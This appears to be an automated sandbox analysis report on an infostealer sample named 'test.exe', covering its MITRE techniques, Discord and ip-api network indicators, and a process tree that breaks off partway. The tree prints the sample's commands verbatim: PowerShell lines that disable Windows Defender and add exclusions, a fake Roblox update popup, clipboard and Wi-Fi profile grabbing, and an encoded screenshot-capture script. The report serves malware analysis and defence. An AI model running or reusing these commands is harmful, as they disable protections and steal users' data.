231702e3b8de9eb6375ee28acea3b5fa05dff62d13f71e828d9cff71dcc6c1fb

Analysis

max time kernel
29s
max time network
13s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
13-10-2024 10:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

test.exe
Size

7.6MB
MD5

dc6bfce338fe5fe3e16f7dd40454bc1c
SHA1

d7f979f9cc11978e0515aef5a72215f5690b0197
SHA256

231702e3b8de9eb6375ee28acea3b5fa05dff62d13f71e828d9cff71dcc6c1fb
SHA512

4e9650abc98ae4bfde3c6913d3858843072765ac805c4419867e494ec008d3bead38dc493a47a99dafe86d150e05c7488a97057f2e39c31ac4398a2fd9797d57
SSDEEP

196608:4aAOwfI9jUCfQN2rXADBbRb9K5IIs63FKIY:7AlIHIDp45IR63+

Score

8^/10

collection defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2764	powershell.exe
1428	powershell.exe
3388	powershell.exe
744	powershell.exe
2684	powershell.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
2852	cmd.exe
3796	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
2800	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
2732	test.exe
2732	test.exe
2732	test.exe
2732	test.exe
2732	test.exe
2732	test.exe
2732	test.exe
2732	test.exe
2732	test.exe
2732	test.exe
2732	test.exe
2732	test.exe
2732	test.exe
2732	test.exe
2732	test.exe
2732	test.exe
2732	test.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
9	discord.com
16	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
1	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 3 IoCs

discovery

Process Discovery

T1057

pid	Process
1752	tasklist.exe
3004	tasklist.exe
1672	tasklist.exe

UPX packed file 57 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x001900000002aae4-21.dat	upx
behavioral1/memory/2732-25-0x00007FFCF6EC0000-0x00007FFCF7522000-memory.dmp	upx
behavioral1/files/0x001c00000002aad1-27.dat	upx
behavioral1/files/0x001900000002aae2-29.dat	upx
behavioral1/memory/2732-30-0x00007FFD09750000-0x00007FFD09777000-memory.dmp	upx
behavioral1/memory/2732-32-0x00007FFD12E50000-0x00007FFD12E5F000-memory.dmp	upx
behavioral1/files/0x001900000002aadc-48.dat	upx
behavioral1/files/0x001900000002aad9-47.dat	upx
behavioral1/files/0x001900000002aad8-46.dat	upx
behavioral1/files/0x001c00000002aad7-45.dat	upx
behavioral1/files/0x001900000002aad6-44.dat	upx
behavioral1/files/0x001900000002aad3-43.dat	upx
behavioral1/files/0x001900000002aad2-42.dat	upx
behavioral1/files/0x001a00000002aad0-41.dat	upx
behavioral1/files/0x001900000002aaeb-40.dat	upx
behavioral1/files/0x001900000002aaea-39.dat	upx
behavioral1/files/0x001c00000002aae9-38.dat	upx
behavioral1/files/0x001c00000002aae3-35.dat	upx
behavioral1/files/0x001900000002aadf-34.dat	upx
behavioral1/memory/2732-54-0x00007FFD08960000-0x00007FFD0898C000-memory.dmp	upx
behavioral1/memory/2732-56-0x00007FFD12DF0000-0x00007FFD12E09000-memory.dmp	upx
behavioral1/memory/2732-58-0x00007FFD08930000-0x00007FFD08955000-memory.dmp	upx
behavioral1/memory/2732-60-0x00007FFCF9BF0000-0x00007FFCF9D6F000-memory.dmp	upx
behavioral1/memory/2732-62-0x00007FFD0F9E0000-0x00007FFD0F9F9000-memory.dmp	upx
behavioral1/memory/2732-64-0x00007FFD12560000-0x00007FFD1256D000-memory.dmp	upx
behavioral1/memory/2732-66-0x00007FFD08870000-0x00007FFD088A4000-memory.dmp	upx
behavioral1/memory/2732-71-0x00007FFD08720000-0x00007FFD087EE000-memory.dmp	upx
behavioral1/memory/2732-74-0x00007FFD09750000-0x00007FFD09777000-memory.dmp	upx
behavioral1/memory/2732-73-0x00007FFCF6540000-0x00007FFCF6A73000-memory.dmp	upx
behavioral1/memory/2732-70-0x00007FFCF6EC0000-0x00007FFCF7522000-memory.dmp	upx
behavioral1/memory/2732-76-0x00007FFD0F9B0000-0x00007FFD0F9C4000-memory.dmp	upx
behavioral1/memory/2732-78-0x00007FFD08960000-0x00007FFD0898C000-memory.dmp	upx
behavioral1/memory/2732-79-0x00007FFD0D2F0000-0x00007FFD0D2FD000-memory.dmp	upx
behavioral1/memory/2732-84-0x00007FFD12DF0000-0x00007FFD12E09000-memory.dmp	upx
behavioral1/memory/2732-85-0x00007FFCFC170000-0x00007FFCFC223000-memory.dmp	upx
behavioral1/memory/2732-183-0x00007FFD08930000-0x00007FFD08955000-memory.dmp	upx
behavioral1/memory/2732-230-0x00007FFCF9BF0000-0x00007FFCF9D6F000-memory.dmp	upx
behavioral1/memory/2732-310-0x00007FFD08870000-0x00007FFD088A4000-memory.dmp	upx
behavioral1/memory/2732-311-0x00007FFD08720000-0x00007FFD087EE000-memory.dmp	upx
behavioral1/memory/2732-331-0x00007FFCF6540000-0x00007FFCF6A73000-memory.dmp	upx
behavioral1/memory/2732-338-0x00007FFCF9BF0000-0x00007FFCF9D6F000-memory.dmp	upx
behavioral1/memory/2732-332-0x00007FFCF6EC0000-0x00007FFCF7522000-memory.dmp	upx
behavioral1/memory/2732-347-0x00007FFCF6EC0000-0x00007FFCF7522000-memory.dmp	upx
behavioral1/memory/2732-367-0x00007FFD08930000-0x00007FFD08955000-memory.dmp	upx
behavioral1/memory/2732-372-0x00007FFD08720000-0x00007FFD087EE000-memory.dmp	upx
behavioral1/memory/2732-371-0x00007FFD08870000-0x00007FFD088A4000-memory.dmp	upx
behavioral1/memory/2732-370-0x00007FFD12560000-0x00007FFD1256D000-memory.dmp	upx
behavioral1/memory/2732-369-0x00007FFD0F9E0000-0x00007FFD0F9F9000-memory.dmp	upx
behavioral1/memory/2732-368-0x00007FFCF9BF0000-0x00007FFCF9D6F000-memory.dmp	upx
behavioral1/memory/2732-366-0x00007FFD12DF0000-0x00007FFD12E09000-memory.dmp	upx
behavioral1/memory/2732-365-0x00007FFD08960000-0x00007FFD0898C000-memory.dmp	upx
behavioral1/memory/2732-364-0x00007FFD12E50000-0x00007FFD12E5F000-memory.dmp	upx
behavioral1/memory/2732-363-0x00007FFD09750000-0x00007FFD09777000-memory.dmp	upx
behavioral1/memory/2732-362-0x00007FFCF6540000-0x00007FFCF6A73000-memory.dmp	upx
behavioral1/memory/2732-361-0x00007FFCFC170000-0x00007FFCFC223000-memory.dmp	upx
behavioral1/memory/2732-360-0x00007FFD0D2F0000-0x00007FFD0D2FD000-memory.dmp	upx
behavioral1/memory/2732-359-0x00007FFD0F9B0000-0x00007FFD0F9C4000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
4820	cmd.exe
4628	netsh.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
1380	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
5056	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 22 IoCs

pid	Process
744	powershell.exe
744	powershell.exe
1428	powershell.exe
2684	powershell.exe
2684	powershell.exe
2684	powershell.exe
1428	powershell.exe
1428	powershell.exe
3796	powershell.exe
3796	powershell.exe
2636	powershell.exe
2636	powershell.exe
3796	powershell.exe
2636	powershell.exe
3388	powershell.exe
3388	powershell.exe
2736	powershell.exe
2736	powershell.exe
2764	powershell.exe
2764	powershell.exe
2260	powershell.exe
2260	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	744	powershell.exe
Token: SeDebugPrivilege	1428	powershell.exe
Token: SeDebugPrivilege	2684	powershell.exe
Token: SeDebugPrivilege	1752	tasklist.exe
Token: SeDebugPrivilege	3004	tasklist.exe
Token: SeIncreaseQuotaPrivilege	3200	WMIC.exe
Token: SeSecurityPrivilege	3200	WMIC.exe
Token: SeTakeOwnershipPrivilege	3200	WMIC.exe
Token: SeLoadDriverPrivilege	3200	WMIC.exe
Token: SeSystemProfilePrivilege	3200	WMIC.exe
Token: SeSystemtimePrivilege	3200	WMIC.exe
Token: SeProfSingleProcessPrivilege	3200	WMIC.exe
Token: SeIncBasePriorityPrivilege	3200	WMIC.exe
Token: SeCreatePagefilePrivilege	3200	WMIC.exe
Token: SeBackupPrivilege	3200	WMIC.exe
Token: SeRestorePrivilege	3200	WMIC.exe
Token: SeShutdownPrivilege	3200	WMIC.exe
Token: SeDebugPrivilege	3200	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3200	WMIC.exe
Token: SeRemoteShutdownPrivilege	3200	WMIC.exe
Token: SeUndockPrivilege	3200	WMIC.exe
Token: SeManageVolumePrivilege	3200	WMIC.exe
Token: 33	3200	WMIC.exe
Token: 34	3200	WMIC.exe
Token: 35	3200	WMIC.exe
Token: 36	3200	WMIC.exe
Token: SeDebugPrivilege	1672	tasklist.exe
Token: SeDebugPrivilege	3796	powershell.exe
Token: SeIncreaseQuotaPrivilege	3200	WMIC.exe
Token: SeSecurityPrivilege	3200	WMIC.exe
Token: SeTakeOwnershipPrivilege	3200	WMIC.exe
Token: SeLoadDriverPrivilege	3200	WMIC.exe
Token: SeSystemProfilePrivilege	3200	WMIC.exe
Token: SeSystemtimePrivilege	3200	WMIC.exe
Token: SeProfSingleProcessPrivilege	3200	WMIC.exe
Token: SeIncBasePriorityPrivilege	3200	WMIC.exe
Token: SeCreatePagefilePrivilege	3200	WMIC.exe
Token: SeBackupPrivilege	3200	WMIC.exe
Token: SeRestorePrivilege	3200	WMIC.exe
Token: SeShutdownPrivilege	3200	WMIC.exe
Token: SeDebugPrivilege	3200	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3200	WMIC.exe
Token: SeRemoteShutdownPrivilege	3200	WMIC.exe
Token: SeUndockPrivilege	3200	WMIC.exe
Token: SeManageVolumePrivilege	3200	WMIC.exe
Token: 33	3200	WMIC.exe
Token: 34	3200	WMIC.exe
Token: 35	3200	WMIC.exe
Token: 36	3200	WMIC.exe
Token: SeDebugPrivilege	2636	powershell.exe
Token: SeDebugPrivilege	3388	powershell.exe
Token: SeDebugPrivilege	2736	powershell.exe
Token: SeIncreaseQuotaPrivilege	932	WMIC.exe
Token: SeSecurityPrivilege	932	WMIC.exe
Token: SeTakeOwnershipPrivilege	932	WMIC.exe
Token: SeLoadDriverPrivilege	932	WMIC.exe
Token: SeSystemProfilePrivilege	932	WMIC.exe
Token: SeSystemtimePrivilege	932	WMIC.exe
Token: SeProfSingleProcessPrivilege	932	WMIC.exe
Token: SeIncBasePriorityPrivilege	932	WMIC.exe
Token: SeCreatePagefilePrivilege	932	WMIC.exe
Token: SeBackupPrivilege	932	WMIC.exe
Token: SeRestorePrivilege	932	WMIC.exe
Token: SeShutdownPrivilege	932	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 224 wrote to memory of 2732	224	test.exe	80
PID 224 wrote to memory of 2732	224	test.exe	80
PID 2732 wrote to memory of 4964	2732	test.exe	82
PID 2732 wrote to memory of 4964	2732	test.exe	82
PID 2732 wrote to memory of 2988	2732	test.exe	83
PID 2732 wrote to memory of 2988	2732	test.exe	83
PID 2732 wrote to memory of 2672	2732	test.exe	84
PID 2732 wrote to memory of 2672	2732	test.exe	84
PID 2732 wrote to memory of 700	2732	test.exe	86
PID 2732 wrote to memory of 700	2732	test.exe	86
PID 2672 wrote to memory of 3100	2672	cmd.exe	90
PID 2672 wrote to memory of 3100	2672	cmd.exe	90
PID 4964 wrote to memory of 744	4964	cmd.exe	91
PID 4964 wrote to memory of 744	4964	cmd.exe	91
PID 2988 wrote to memory of 1428	2988	cmd.exe	92
PID 2988 wrote to memory of 1428	2988	cmd.exe	92
PID 700 wrote to memory of 2684	700	cmd.exe	93
PID 700 wrote to memory of 2684	700	cmd.exe	93
PID 2732 wrote to memory of 3984	2732	test.exe	95
PID 2732 wrote to memory of 3984	2732	test.exe	95
PID 2732 wrote to memory of 2764	2732	test.exe	94
PID 2732 wrote to memory of 2764	2732	test.exe	94
PID 2764 wrote to memory of 1752	2764	cmd.exe	98
PID 2764 wrote to memory of 1752	2764	cmd.exe	98
PID 3984 wrote to memory of 3004	3984	cmd.exe	99
PID 3984 wrote to memory of 3004	3984	cmd.exe	99
PID 2732 wrote to memory of 2940	2732	test.exe	100
PID 2732 wrote to memory of 2940	2732	test.exe	100
PID 2732 wrote to memory of 2852	2732	test.exe	103
PID 2732 wrote to memory of 2852	2732	test.exe	103
PID 2732 wrote to memory of 2436	2732	test.exe	105
PID 2732 wrote to memory of 2436	2732	test.exe	105
PID 2732 wrote to memory of 3516	2732	test.exe	107
PID 2732 wrote to memory of 3516	2732	test.exe	107
PID 2732 wrote to memory of 1404	2732	test.exe	109
PID 2732 wrote to memory of 1404	2732	test.exe	109
PID 2732 wrote to memory of 4820	2732	test.exe	108
PID 2732 wrote to memory of 4820	2732	test.exe	108
PID 2732 wrote to memory of 1892	2732	test.exe	111
PID 2732 wrote to memory of 1892	2732	test.exe	111
PID 2940 wrote to memory of 3200	2940	cmd.exe	115
PID 2940 wrote to memory of 3200	2940	cmd.exe	115
PID 2852 wrote to memory of 3796	2852	cmd.exe	116
PID 2852 wrote to memory of 3796	2852	cmd.exe	116
PID 2436 wrote to memory of 1672	2436	cmd.exe	117
PID 2436 wrote to memory of 1672	2436	cmd.exe	117
PID 3516 wrote to memory of 2068	3516	cmd.exe	120
PID 3516 wrote to memory of 2068	3516	cmd.exe	120
PID 4820 wrote to memory of 4628	4820	cmd.exe	119
PID 4820 wrote to memory of 4628	4820	cmd.exe	119
PID 1892 wrote to memory of 2636	1892	cmd.exe	118
PID 1892 wrote to memory of 2636	1892	cmd.exe	118
PID 1404 wrote to memory of 5056	1404	cmd.exe	121
PID 1404 wrote to memory of 5056	1404	cmd.exe	121
PID 2732 wrote to memory of 3776	2732	test.exe	122
PID 2732 wrote to memory of 3776	2732	test.exe	122
PID 3776 wrote to memory of 1276	3776	cmd.exe	124
PID 3776 wrote to memory of 1276	3776	cmd.exe	124
PID 2732 wrote to memory of 4108	2732	test.exe	125
PID 2732 wrote to memory of 4108	2732	test.exe	125
PID 4108 wrote to memory of 3188	4108	cmd.exe	127
PID 4108 wrote to memory of 3188	4108	cmd.exe	127
PID 2732 wrote to memory of 4964	2732	test.exe	140
PID 2732 wrote to memory of 4964	2732	test.exe	140

C:\Users\Admin\AppData\Local\Temp\test.exe
"C:\Users\Admin\AppData\Local\Temp\test.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:224
- C:\Users\Admin\AppData\Local\Temp\test.exe
  "C:\Users\Admin\AppData\Local\Temp\test.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2732
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\test.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4964
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\test.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:744
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2988
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1428
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Roblox Updating Wait Executor Opening !', 0, 'Wait !!!', 32+16);close()""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2672
  - - C:\Windows\system32\mshta.exe
      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Roblox Updating Wait Executor Opening !', 0, 'Wait !!!', 32+16);close()"
      4⤵
      PID:3100
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‌ .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:700
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‌ .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2684
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2764
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:1752
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3984
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:3004
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2940
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3200
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:2852
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3796
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2436
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:1672
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3516
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2068
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    - Suspicious use of WriteProcessMemory
    PID:4820
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:4628
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1404
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:5056
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1892
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
